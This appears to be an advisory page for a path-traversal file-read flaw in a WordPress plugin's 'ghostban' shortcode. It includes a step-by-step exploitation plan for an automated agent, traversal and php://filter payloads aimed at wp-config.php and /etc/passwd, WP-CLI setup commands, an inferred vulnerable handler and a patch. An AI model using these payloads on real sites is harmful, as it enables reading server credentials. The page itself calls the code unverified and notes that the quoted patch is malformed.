CVE-2025-15020

Gotham Block Extra Light <= 1.5.0 - Authenticated (Contributor+) Arbitrary File Read via 'ghostban' Shortcode

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
6.5
CVSS Score
medium
Severity
1.6.0
Patched in
2d
Time to patch

Description

The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Technical Details

Affected versions: <= 1.5.0
Published: January 13, 2026
Last updated: January 15, 2026
Research Plan
Unverified

This plan outlines the research and exploitation strategy for CVE-2025-15020, an Arbitrary File Read vulnerability in the Gotham Block Extra Light plugin (<= 1.5.0) via the ghostban shortcode.


1. Vulnerability Summary

The Gotham Block Extra Light plugin registers a shortcode named ghostban. This shortcode's handler function likely accepts an attribute (e.g., src, file, or url) that defines a file path to be read or included. Due to a lack of path validation and sanitization (Improper Limitation of a Pathname to a Restricted Directory), an authenticated user with Contributor-level permissions can provide a path traversal payload (e.g., ../../../../wp-config.php) to read sensitive files from the server.

2. Attack Vector Analysis

  • Entry Point: The ghostban shortcode processed within WordPress post/page content.
  • Authentication Level: Authenticated (Contributor+). Contributors can create posts (saved as drafts or pending review) and preview them, but cannot publish; the shortcode is still rendered in the preview, so publishing is not required.
  • Vulnerable Parameter: An attribute of the [ghostban] shortcode (e.g., src or file).
  • Preconditions: The plugin gotham-block-extra-light must be active. The attacker must have a user account with at least contributor role.

3. Code Flow (Inferred)

  1. Registration: The plugin calls add_shortcode( 'ghostban', 'callback_function' ) during initialization (likely in init or the main plugin file).
  2. Execution: When a post containing [ghostban ...] is viewed or previewed, WordPress calls the callback_function.
  3. Attribute Handling: The callback uses shortcode_atts() to parse attributes. One of these attributes is used as a file path.
  4. The Sink: The callback passes this attribute into a file-reading function like file_get_contents(), readfile(), or include() without using basename() or validating that the path resides within the plugin's intended directory.

4. Nonce Acquisition Strategy

Shortcodes are typically processed as part of the content rendering pipeline. Unlike AJAX or REST API endpoints, shortcode rendering does not require a nonce. The "authorization" is the ability to create or edit a post where the shortcode can be placed.

However, if the shortcode handler relies on any localized data for JS-based rendering (unlikely for a simple file read):

  1. Check for wp_localize_script in the plugin source.
  2. Use browser_eval to extract variables if they contain hints about the attribute names.

5. Exploitation Strategy

Step 1: Discover Attribute Name

Since the source is not provided, we must first identify which attribute the ghostban shortcode uses.

  • Action: Grep the plugin directory for the shortcode registration.
  • Command: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/gotham-block-extra-light/
  • Identification: Find the function name, then grep for that function to see the attribute keys (e.g., src, file, template).

Step 2: Create Malicious Post

Create a post as a Contributor containing the traversal payload.

  • Payload Example: [ghostban src="../../../../../wp-config.php"] (assuming src is the attribute).

Step 3: Trigger the Read

View the post (or its preview) via a logged-in session.

  • Tool: http_request (Playwright) or browser_navigate.
  • Target URL: http://localhost:8080/?p=[POST_ID] or the preview URL.
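The grep-based discovery in Step 1 (and the Recon/Analysis steps of section 10) can be automated. The helper below is an added example, not the plugin's or this page's code: it finds add_shortcode() registrations, pulls out each string callback, lists the keys passed to shortcode_atts(), and flags file-system sinks in the callback body. The embedded source is constructed from this page's inferred handler, and the list of sink functions is an assumption; point it at a real plugin directory with `php find_shortcode_sinks.php /var/www/html/wp-content/plugins/gotham-block-extra-light/`.

```php
<?php
// Added example, not the plugin's or this page's code: a static-analysis helper
// for "Step 1: Discover Attribute Name" and the Recon/Analysis steps of
// section 10. It finds add_shortcode() registrations, locates each string
// callback, lists the keys passed to shortcode_atts(), and flags file-system
// sinks inside the callback body. The embedded source is constructed from this
// page's inferred handler; the list of sink functions is an assumption.
// Usage: php find_shortcode_sinks.php [/path/to/plugin-dir]

const FILE_SINKS = array(
    'file_get_contents', 'readfile', 'fopen', 'file', 'fpassthru',
    'include', 'include_once', 'require', 'require_once', 'SplFileObject',
);

// Source text of the top-level `function $name(...) { ... }`, or null if absent.
// Braces are matched by counting, which is adequate for plugin-sized code but
// is fooled by braces inside strings or comments.
function extract_function_body( $source, $name ) {
    if ( ! preg_match( '/\bfunction\s+' . preg_quote( $name, '/' ) . '\s*\(/', $source, $m, PREG_OFFSET_CAPTURE ) ) {
        return null;
    }
    $from  = $m[0][1];
    $start = strpos( $source, '{', $from );
    if ( $start === false ) {
        return null;
    }
    $depth = 0;
    for ( $i = $start, $len = strlen( $source ); $i < $len; $i++ ) {
        if ( $source[ $i ] === '{' ) {
            $depth++;
        } elseif ( $source[ $i ] === '}' && --$depth === 0 ) {
            return substr( $source, $from, $i - $from + 1 );
        }
    }
    return null;
}

// One finding per add_shortcode( 'tag', 'callback' ) registration in $source.
// Array/closure callbacks are reported without body analysis.
function find_shortcode_sinks( $source ) {
    $findings = array();
    preg_match_all( '/add_shortcode\s*\(\s*([\'"])([^\'"]+)\1\s*,\s*([\'"])([^\'"]+)\3\s*\)/', $source, $regs, PREG_SET_ORDER );
    foreach ( $regs as $r ) {
        $finding = array( 'shortcode' => $r[2], 'callback' => $r[4], 'atts' => array(), 'sinks' => array() );
        $body    = extract_function_body( $source, $r[4] );
        if ( $body !== null ) {
            // Keys of the defaults array handed to shortcode_atts(), e.g. 'src' => ''.
            if ( preg_match( '/shortcode_atts\s*\(\s*(?:array\s*\(|\[)(.*?)(?:\)|\])\s*,/s', $body, $am ) ) {
                preg_match_all( '/([\'"])([A-Za-z0-9_-]+)\1\s*=>/', $am[1], $keys );
                $finding['atts'] = $keys[2];
            }
            foreach ( FILE_SINKS as $sink ) {
                // `\s*[(\s]` keeps `file` from matching file_get_contents or file_exists.
                if ( preg_match( '/\b' . preg_quote( $sink, '/' ) . '\s*[(\s]/', $body ) ) {
                    $finding['sinks'][] = $sink;
                }
            }
        }
        $findings[] = $finding;
    }
    return $findings;
}

// Constructed sample: this page's inferred vulnerable handler, not the real plugin source.
$sample = <<<'SRC'
<?php
add_shortcode( 'ghostban', 'gotham_ghostban_shortcode' );

function gotham_ghostban_shortcode( $atts ) {
    $a = shortcode_atts( array(
        'src' => '',
    ), $atts );

    if ( ! empty( $a['src'] ) ) {
        return file_get_contents( $a['src'] );
    }
    return '';
}
SRC;

if ( PHP_SAPI === 'cli' && realpath( $argv[0] ) === __FILE__ ) {
    $sources = array( '(embedded sample)' => $sample );
    if ( isset( $argv[1] ) && is_dir( $argv[1] ) ) {
        $sources = array();
        $iter    = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $argv[1], FilesystemIterator::SKIP_DOTS ) );
        foreach ( $iter as $info ) {
            if ( $info->isFile() && $info->getExtension() === 'php' ) {
                $sources[ $info->getPathname() ] = file_get_contents( $info->getPathname() );
            }
        }
    }
    foreach ( $sources as $file => $src ) {
        foreach ( find_shortcode_sinks( $src ) as $hit ) {
            printf( "%s: [%s] -> %s() atts=%s sinks=%s%s\n",
                $file, $hit['shortcode'], $hit['callback'],
                $hit['atts'] ? implode( ',', $hit['atts'] ) : '-',
                $hit['sinks'] ? implode( ',', $hit['sinks'] ) : '-',
                ( $hit['atts'] && $hit['sinks'] ) ? '   <-- attribute and file sink in one callback: inspect' : '' );
        }
    }
}
```

On the embedded sample this reports the ghostban shortcode, its callback, the single `src` attribute and the file_get_contents sink in one line. The output is a triage list, not a verdict: a callback that both parses attributes and touches the file system still has to be read by hand to confirm that the attribute actually reaches the sink without validation.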

6. Test Data Setup

  1. Install Plugin: Ensure gotham-block-extra-light version <= 1.5.0 is installed and active.
  2. Create User:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password
    
  3. Identify Target File: We will aim to read /etc/passwd (Linux system file) or wp-config.php (WordPress configuration).

7. Expected Results

  • The HTTP response for the post view will contain the raw text of the requested file (e.g., DB_PASSWORD from wp-config.php or user definitions from /etc/passwd).
  • The data will likely appear within the <div> or container where the shortcode output is rendered.

8. Verification Steps

  1. Primary: Check the response body of the http_request for the string root:x:0:0 (if reading /etc/passwd) or DB_NAME (if reading wp-config.php).
  2. Comparison: Verify that the content matches the actual file on disk.
    cat /var/www/html/wp-config.php
    

9. Alternative Approaches

  • Different Attributes: If src fails, try file, path, url, id, name, template.
  • Null Byte Injection: If the plugin appends an extension (e.g., .php), a trailing null byte would truncate the path only on PHP older than 5.3.4; newer versions reject paths containing NUL. Two further obstacles apply here: WordPress does not URL-decode %00 in post content, and a literal NUL byte is removed by wp_kses (contributors lack the unfiltered_html capability, so their content is filtered), so this variant is unlikely to be viable.
  • Wrappers: php://filter does not require allow_url_fopen and is most useful when the sink is include() or require(): [ghostban src="php://filter/convert.base64-encode/resource=../../wp-config.php"] returns the PHP source base64-encoded instead of executing it. When the sink is file_get_contents(), the plain traversal path already returns the raw file.
  • Preview Mode: If the post isn't published, use the preview URL: http://localhost:8080/?p=[POST_ID]&preview=true. Previewing an unpublished post requires the author's (or an editor's) logged-in session, so the request must carry the contributor's session cookies.

10. Implementation Plan for Automated Agent

  1. Recon:
    • ls -R /var/www/html/wp-content/plugins/gotham-block-extra-light/
    • grep -r "add_shortcode.*ghostban" /var/www/html/wp-content/plugins/gotham-block-extra-light/
  2. Analysis:
    • Find the callback function.
    • Examine the callback to find shortcode_atts and the file system sink (e.g. include, file_get_contents).
  3. Execution:
    • wp user create contributor_user user@test.com --role=contributor --user_pass=password
    • POST_ID=$(wp post create --post_author=$(wp user get contributor_user --field=ID) --post_content='[ghostban src="../../../../../../../etc/passwd"]' --post_status=publish --post_title='Vulnerability Test' --porcelain)
    • Perform http_request to http://localhost:8080/?p=$POST_ID and check the body for root:x:0:0. (WP-CLI runs with full capabilities, so --post_status=publish is fine for the lab; a real contributor would save a draft and use the preview URL instead.)
  4. Cleanup:
    • wp post delete $POST_ID --force
    • wp user delete contributor_user --reassign=1
Research Findings
Static analysis — not yet PoC-verified

Summary

The Gotham Block Extra Light plugin for WordPress is vulnerable to an arbitrary file read through the 'ghostban' shortcode handler. Authenticated users with Contributor-level permissions can use path traversal in a shortcode attribute to read sensitive files from the server, such as wp-config.php.

Vulnerable Code

// gotham-block-extra-light/gotham-block-extra-light.php (approximate location)
add_shortcode( 'ghostban', 'gotham_ghostban_shortcode' );

function gotham_ghostban_shortcode( $atts ) {
    $a = shortcode_atts( array(
        'src' => '',
    ), $atts );

    if ( ! empty( $a['src'] ) ) {
        // Vulnerable: user-controlled 'src' is passed directly to a file-reading function
        return file_get_contents( $a['src'] );
    }
    return '';
}

Security Fix

--- a/gotham-block-extra-light/gotham-block-extra-light.php
+++ b/gotham-block-extra-light/gotham-block-extra-light.php
@@ -10,5 +10,12 @@
 
     if ( ! empty( $a['src'] ) ) {
-        return file_get_contents( $a['src'] );
+        $file = basename( $a['src'] );
+        $path = plugin_dir_path( __FILE__ ) . 'assets/' . $file;
+        if ( file_exists( $path ) ) {
+            return file_get_contents( $path );
+        }
     }
     return '';
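Review bot: the file_exists() check at `+        if ( file_exists( $path ) ) {` is also true for directories, so a request such as src=".." (basename() leaves it unchanged) resolves to the plugin directory itself and file_get_contents() then emits a warning and returns false; use is_file() instead and, for defence in depth, compare realpath( $path ) against realpath( plugin_dir_path( __FILE__ ) . 'assets' ) so that a symlink placed inside assets/ cannot point outside it. Separately, the hunk header `@@ -10,5 +10,12 @@` does not match the body (5 old lines, 9 new lines), so the patch as quoted will not apply cleanly.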

Exploit Outline

The exploit requires an authenticated attacker with at least Contributor-level permissions. The attacker creates or edits a post and inserts the `[ghostban]` shortcode. By providing a path traversal payload (e.g., `../../../../wp-config.php`) to the 'src' (or similar) attribute of the shortcode, the attacker can force the server to read and display the contents of arbitrary files when the post is viewed or previewed. Since WordPress processes shortcodes during content rendering, the file contents are returned in the HTTP response of the post page.
